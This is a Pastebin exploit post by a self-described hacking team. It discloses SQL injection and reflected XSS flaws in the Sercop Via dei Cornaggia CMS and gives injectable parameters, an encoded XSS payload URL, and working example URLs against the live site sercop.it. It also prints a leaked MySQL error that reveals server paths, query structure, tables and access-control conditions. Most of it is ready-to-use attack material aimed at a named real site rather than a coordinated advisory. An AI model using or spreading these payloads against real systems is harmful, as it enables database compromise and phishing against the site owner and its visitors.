KingSkrupellos

Sercop Via dei Cornaggia XSS SQL Injection

Aug 23rd, 2019
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.97 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Sercop Via dei Cornaggia XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 24/08/2019
  7. # Vendor Homepage : sercop.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Impact :
  22. ***********
  23. Sercop Via dei Cornaggia is prone to an SQL-injection
  24. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  25. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  26. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  27. A remote attacker can send a specially crafted request to the vulnerable application and
  28. execute arbitrary SQL commands in application`s database. Further exploitation of this
  29. vulnerability may result in unauthorized data manipulation.
  30. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  31.  
  32. Reflected XSS (or Non-Persistent) :
  33. ***************************************
  34. The server reads data directly from the HTTP request and reflects it back in the
  35. HTTP response. Reflected XSS exploits occur when an attacker causes a victim to
  36. supply dangerous content to a vulnerable web application, which is then reflected back
  37. to the victim and executed by the web browser. The most common mechanism for
  38. delivering malicious content is to include it as a parameter in a URL that is
  39. posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute
  40. the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
  41. that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
  42. the content is executed by the victim's browser.
  43.  
  44. ###################################################################
  45.  
  46. # SQL Injection Exploit :
  47. **********************
  48. /index.php?section_id=[ID-NUMBER]&p=articles&o=view&article_id=[SQL Injection]
  49.  
  50. /index.php?section_id=[ID-NUMBER]&p=news&o=view&pieceofnews_id=[SQL Injection]
  51.  
  52. # Cross Site Scripting XSS Exploit :
  53. ********************************
  54. /index.php?section_id=112&p=news&o=view&pieceofnews_id=1%27
  55. %3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-
  56. By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  57.  
  58. ###################################################################
  59.  
  60. # Example Vulnerable Sites :
  61. *************************
  62. [+] sercop.it/index.php?section_id=112&p=news&o=view&pieceofnews_id=1%27
  63.  
  64. [+] sercop.it/index.php?section_id=112&p=news&o=view&pieceofnews_id=1%27
  65. %3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-
  66. By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  67.  
  68. ###################################################################
  69.  
  70. # Example SQL Database Error :
  71. ****************************
  72. ERR /var/www/cms-mol-produzione/sercop/release-beta/engine/Model.php 132
  73. _doQuery: [Error message: Could not execute statement]
  74. [Last executed query: select tr.*, a.site_id, a.creation_date, a.owner_id,
  75. a.owner_del, a.owner_edit, a.modified_date, a.modifier_id, a.cond,
  76. a.cond_term from (select e.*
  77. group_concat(cd9.category_id separator ' , ') as categories,
  78. group_concat(cd10.name separator ' , ') as categories_names,
  79. group_concat(path separator ';') as paths,
  80. group_concat(pathname separator ';') as pathnames
  81. from (select cd6.*,
  82. group_concat(cd8.name separator ' , ') as pathname,
  83. group_concat(cd7.parent_category_id separator ' , ') as path
  84. from news_categories cd6
  85. join categories_tree cd7 on cd6.category_id=cd7.category_id
  86. join categories cd8 on cd8.category_id=cd7.parent_category_id group
  87. by pieceofnews_id, cd6.category_id order by cd7.level) as cd9
  88. join categories cd10 on cd9.category_id=cd10.category_id
  89. group by pieceofnews_id) as cd11 on (cd11.pieceofnews_id=e.pieceofnews_id)
  90. where
  91. e.pieceofnews_id = 1' ) tr, acls a
  92. where
  93. a.acl_id=tr.acl_id
  94. and a.site_id = 1 and (((a.cond = 'memberOf') and (a.cond_term in ('visitatore'))))]
  95. [Native code: 1064]
  96. [Native message: You have an error in your SQL syntax; check the manual that
  97. corresponds to your MySQL server version for the right syntax to use near '' ) tr, acls a
  98. where
  99. a.acl_id=tr.acl_id
  100. and a.site_id = 1 and (((a.cond = 'm' at line 34]
  101.  
  102. ###################################################################
  103.  
  104. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  105.  
  106. ###################################################################
Add Comment
Please, Sign In to add comment